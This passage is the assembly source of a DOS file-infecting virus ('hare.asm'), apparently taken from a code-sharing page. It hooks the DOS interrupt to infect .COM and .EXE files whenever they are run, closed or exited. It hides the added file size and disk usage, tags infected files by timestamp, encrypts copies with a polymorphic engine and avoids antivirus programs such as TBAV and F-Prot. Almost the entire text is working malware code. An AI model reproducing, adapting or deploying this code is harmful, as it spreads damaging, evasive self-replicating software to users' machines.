📄 hare.asm
字号:
AND AL, 00011111b
CMP AL, 00010001b ; 34 seconds?
JNE Exit_Size_Stealth
SUB WORD PTR ES:[BX+1AH], (Virus_Size + 70)
SBB WORD PTR ES:[BX+1CH], 0
Exit_Size_Stealth:
POP ES
POP BX
POP AX
POPF
RETF 2
Size_Stealth: MOV CS:Function_i21h, AH ; Save function #.
JMP Stealth_Filesize
Function_i21h DB 4Eh
Residency_Check:
MOV AX, 0Dh ; Return our sign.
POPF
RETF 2
NewInt21h:
PUSHF
CMP AX, 0FE23h ; Residency-check.
JE Residency_Check
CMP AH, 36h ; Get free diskspace.
JNE Check_Next_3
JMP Stealth_DiskSpace
Check_Next_3:
CMP AH, 4Ch ; Program terminate.
JE Check_PSP_Infect
CMP AH, 31h ; Terminate & stay resident.
JE Check_PSP_Infect
CMP AH, 00h ; Terminate program.
JE Check_PSP_Infect
CMP AX, 4B00h ; Program execute.
JNE Check_Next_4
CALL Infect_Exec
Check_Next_4:
CMP AH, 11h ; Findfirst (FCB).
JE Size_Stealth
CMP AH, 12h ; Findnext (FCB).
JE Size_Stealth
CMP AH, 4Eh ; Findfirst (handle).
JE Size_Stealth
CMP AH, 4Fh ; Findnext (handle).
JE Size_Stealth
CMP AH, 3Dh ; Open file (handle).
JNE Check_Next_5
CALL Clean_File
Check_Next_5:
CMP AH, 3Eh ; Close file (handle).
JNE LOC_39
POPF
CALL Infect_Close
RETF 2 ; Return to caller.
LOC_39:
POPF
JMP DWORD PTR CS:Int21h
Check_PSP_Infect:
AND CS:Flags, 00000100b
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH ES
PUSH DS
MOV AH, 62h ; Get PSP.
CALL Traced_i21h
JC Exit_PSP_Check
CLD
MOV ES, BX
MOV ES, ES:[2Ch]
XOR DI, DI
MOV AL, 00h
LOC_41:
MOV CX, 0FFFFh
REPNE SCASB
CMP ES:[DI], AL
JNE LOC_41
ADD DI, 03h
MOV DX, DI
PUSH ES
POP DS
MOV AX, 3D00h ; Open file...
CALL Traced_i21h
JC Exit_PSP_Check
MOV BX, AX ; And infect it on closing.
CALL Infect_Close
Exit_PSP_Check:
POP DS
POP ES
POP DI
POP DX
POP CX
POP BX
POP AX
POPF
JMP DWORD PTR CS:Traced_Int21h
; AX = 4B00h
Infect_Exec:
PUSH AX ; Save registers.
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH DS
PUSH DI
PUSH SI
CALL Check_To_Del_Driver
CALL Set_Dummy_Handlers
CALL Save_FileAttr
CALL Check_FileName
PUSHF
PUSH DS
PUSH CS
POP DS
MOV DI, 0
ORG $-2
Gaby1 DW OFFSET FileName1
MOV SI, OFFSET FileName2
ADD BX, 04h
MOV CX, BX
REP MOVSB
POP DS
POPF
JC Exit_Infect_Exec ; Special file?
MOV AX, 3D02h ; Open file r/w.
CALL Traced_i21h
XCHG BX, AX ; BX = Filehandle.
CALL Save_FileTime
MOV AX, CS:Trace_Int ; Get filetime.
AND AL, 00011111b ; Mask seconds.
PUSH AX
MOV AH, 3Fh ; Read header.
MOV CX, 28
PUSH CS
POP DS
PUSH DS
POP ES
MOV DX, OFFSET Buffer
CALL Traced_i21h
MOV SI, DX
CLD
LODSW ; Get 1st word from header.
CMP AX, 'ZM' ; True .EXE-file?
JE Is_EXE
CMP AX, 'MZ' ; True .EXE-file?
JNE Is_COM ; Else it's a .COM-file.
Is_EXE:
POP AX ; POP filetime.
TEST Flags, 00000100b
JZ LOC_44
CMP AL, 11h
JE LOC_47
CALL Infect_EXE
JNC LOC_46
JMP Exit_Infect_Exec
LOC_44:
CMP AL, 11h
JNE LOC_47
CALL SUB_41
JNC LOC_47
JMP Exit_Infect_Exec
Is_COM:
POP AX ; AX = Filetime.
CMP AL, 11h ; 34 seconds, infected?
JE Exit_Infect_Exec
CALL Infect_COM
JC LOC_47
LOC_46:
MOV AX, Trace_Int ; Set infected timestamp.
AND AL, 11100000b
OR AL, 11h ; 34 seconds.
MOV Trace_Int, AX
LOC_47:
CALL Restore_FileTime
Exit_Infect_Exec:
MOV AH, 3Eh ; Close file.
CALL Traced_i21h
CALL Restore_FileAttr
CALL Restore_Dummy_Handlers
POP SI ; Restore registers.
POP DI
POP DS
POP ES
POP DX
POP CX
POP BX
POP AX
RETN
; Checks if INT 13h part is resident, and deletes portdriver if so.
Check_To_Del_Driver:
CALL Del_PortDriver
MOV AX, 160Ah ; Identify Windows version
INT 2Fh ; and type.
OR AX, AX ; Legal function?
JNZ Exit_Del_PortDriver
CMP BH, 04h ; Windows ver. 4 or higher?
JB Exit_Del_PortDriver
MOV AX, 5445h ; INT 13h residency-check.
INT 13h
CMP AX, 4554h ; INT 13h part installed?
JNE Exit_Del_PortDriver
CALL Del_PortDriver
JC LOC_49 ; File not found?
RETN
LOC_49:
CALL Unslice_Int13h
Exit_Del_PortDriver:
RETN
Infect_EXE:
CMP Reloc_Offs, 40h ; PE-header?
JNE LOC_52
STC
LOC_51:
JMP Exit_Infect_EXE
LOC_52:
MOV DI, OFFSET Old_Entry ; Save old CS:IP.
MOV SI, OFFSET Init_IP
MOVSW
MOVSW
MOV SI, OFFSET Init_SS ; Save old SS:SP.
MOV DI, OFFSET Old_Stack+2
MOVSW
SUB DI, 04h
MOVSW
MOV SI, DX ; Buffer.
MOV Host_Type, 01h ; Host is .EXE-file.
CALL Check_Infect ; Suitable for infection?
JC LOC_51 ; CF set if not.
MOV AX, Trace_Int ; Save time.
MOV FileTime, AX
MOV AX, [SI+2] ; Filesize MOD 512.
MOV Old_Mod512, AX
MOV AX, [SI+4] ; File in 512-byte pages.
MOV Old_Byte_Pages, AX
MOV AX, [SI+4] ;
MOV DX, 512
CMP WORD PTR [SI+2], 0 ; No rounding?
JE LOC_53
DEC AX ;
LOC_53:
MUL DX ; Calculate filesize.
MOV Temp1+2, DX
MOV DX, [SI+2]
ADD AX, DX ; Plus filesize MOD 512.
ADC Temp1+2, 00h
MOV Temp1, AX
PUSH AX
XOR CX, CX ; Go to end of file.
MOV DX, CX ; DX:AX = Filesize.
MOV AX, 4202h
CALL Traced_i21h
SUB AX, Temp1 ; Same size as in header?
JZ Good_Size_Lo ; (ie. no internal overlay?).
POP AX
STC
JMP Exit_Infect_EXE
Good_Size_Lo:
SUB DX, Temp1+2 ; Same size as in header?
JZ Good_Size_Hi
POP AX
STC
JMP Exit_Infect_EXE
Good_Size_Hi:
POP AX ; Filesize low.
MOV CX, Temp1+2 ; Filesize high.
MOV DX, AX
MOV AX, 4200h ; Go to end file.
CALL Traced_i21h
MOV AX, 1E7Bh
MOV DX, [SI+2] ; Filesize MOD 512.
ADD DX, AX
LOC_56:
INC WORD PTR [SI+4] ; Filesize in 512-byte pages.
SUB DX, 512
CMP DX, 512
JA LOC_56
JNE LOC_57
XOR DX, DX
LOC_57:
MOV [SI+2], DX
MOV AX, [SI+8] ; Size header in paragraphs.
MOV CX, 16
MUL CX ; Calculate headersize bytes.
MOV CX, Temp1 ; Filesize minus headersize.
SUB CX, AX
SBB Temp1+2, DX
MOV DI, Temp1+2 ; Filesize high.
MOV SI, CX ; Filesize low.
MOV DX, DI
MOV AX, SI
MOV CX, 16
DIV CX ; Filesize DIV 16.
MOV DI, AX
MOV SI, DX
MOV Host_Entrypoint, SI
MOV Padding, SI ; 0 - 15 bytes padding.
ADD SI, OFFSET Buffer ; Plus end of virus.
MOV Temp1, SI
MOV Temp1+2, DI
CLD ; Set host's new entrypoint.
MOV SI, OFFSET Temp1
MOV DI, OFFSET Init_IP
MOVSW
MOVSW
CALL Poly_Engine ; Polymorphic encryptor.
JC Exit_Infect_EXE
XOR CX, CX ; Go to start of file.
MOV DX, CX
MOV AX, 4200h
CALL Traced_i21h
CALL Make_Random_Stack
MOV DX, OFFSET Buffer ; Write updated header.
MOV AH, 40h
MOV CX, 28
CALL Traced_i21h
Exit_Infect_EXE:
RETN
Infect_COM:
MOV Host_Type, 00h ; Set host as .COM-file.
CLD
MOV DI, OFFSET Host_COM_JMP
MOV SI, OFFSET Buffer
CALL Check_Infect ; Suitable for infection?
JC LOC_59
MOV CX, 3 ; Copy first 3 bytes of host
REP MOVSB ; to our storage-place.
MOV DX, CX ; Go to end of file.
MOV AX, 4202h ; DX:AX = Filesize.
CALL Traced_i21h
OR DX, DX ; File under 64k?
JZ LOC_60
LOC_59:
STC
JMP Exit_Infect_COM
LOC_60:
CMP AX, 30 ; File too small?
JB LOC_59
XOR CX, CX ; Go to end of file.
MOV DX, CX ; DX:AX = Filesize.
MOV AX, 4202h
CALL Traced_i21h
CMP AX, 55701 ; File too big?
JB LOC_61
STC ; Set carry-flag (error).
JMP Exit_Infect_COM
LOC_61:
MOV Host_Entrypoint, AX
ADD Host_Entrypoint, 100h
MOV Padding, AX ; Virus entrypoint.
ADD Padding, 100h ; Plus .COM-entrypoint.
MOV DI, OFFSET JMP_COM
MOV BYTE PTR [DI], 0E9h ; JMP opcode.
SUB AX, 3 ; Minus displacement.
ADD AX, Virus_Size ; Plus entrypoint.
MOV [DI+1], AX ; Store it.
CALL Poly_Engine ; Append polymorphic copy.
JC Exit_Infect_COM
XOR CX, CX ; Go to start file.
MOV DX, CX
MOV AX, 4200h
CALL Traced_i21h
MOV CX, 3 ; Write JMP Virus to start
MOV DX, OFFSET JMP_COM ; of .COM-file.
MOV AH, 40h
CALL Traced_i21h
Exit_Infect_COM:
RETN
Save_FileTime:
MOV AX, 5700h ; Get filetime.
CALL Traced_i21h
MOV CS:Trace_Int, CX
MOV CS:Trace_Int+2, DX
RETN
; Guess what...!?
Restore_FileTime:
MOV AX, 5701h ; Set timestamp.
MOV CX, CS:Trace_Int
MOV DX, CS:Trace_Int+2
CALL Traced_i21h
RETN
;
; Saves file attributes, and clears them afterwards.
; In: BX = Filehandle.
;
Save_FileAttr:
MOV AX, 4300h ; Get file-attributes.
CALL Traced_i21h
MOV CS:CodeSegment, CX
MOV AX, 4301h ; Clear file-attributes.
XOR CX, CX
CALL Traced_i21h
RETN
Restore_FileAttr:
MOV AX, 4301h ; Set file-attributes.
MOV CX, CS:CodeSegment
CALL Traced_i21h
RETN
SUB_14:
PUSH DS
PUSH CS
POP DS
CLD
MOV SI, OFFSET FileName2
SUB BX, 4
JC LOC_63
MOV AX, [SI]
CMP AX, 'BT' ; TBAV utilities?
STC
JE LOC_63
CMP AX, '-F' ; F-Prot?
JE LOC_65
CMP AX, 'VI' ; Invircible?
JE LOC_65
CMP AX, 'HC' ; CHKDSK.EXE ?
JE LOC_64
MOV AL, 'V' ; Filename contains a 'V' ?
MOV DI,OFFSET FileName2
MOV CX, BX
INC CX
REPNE SCASB
OR CX, CX ; Found?
STC
JNZ LOC_63 ; Then exit with carry set.
MOV DI, OFFSET FileName2 ; Filename is COMMAND.* ?
MOV SI, OFFSET Command_Com
MOV CX, BX
REPE CMPSB
OR CX, CX ; Found?
STC
JZ LOC_63 ; Then exit with carry set.
CLC
LOC_63:
POP DS
RETN
LOC_64:
OR Flags, 00000010b
POP DS
RETN
LOC_65:
OR Flags, 00000001b
STC
POP DS
RETN
Check_FileName:
PUSH DS
POP ES
XOR AL, AL
MOV DI, DX
XOR CX, CX
MOV CL, 0FFh
MOV BX, CX
CLD
REPNE SCASB ; Find end of ASCIIZ-string.
DEC DI
DEC DI
SUB BX, CX
MOV CX, BX
STD
MOV AL, '\'
REPNE SCASB ; Find start filename.
SUB BX, CX
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -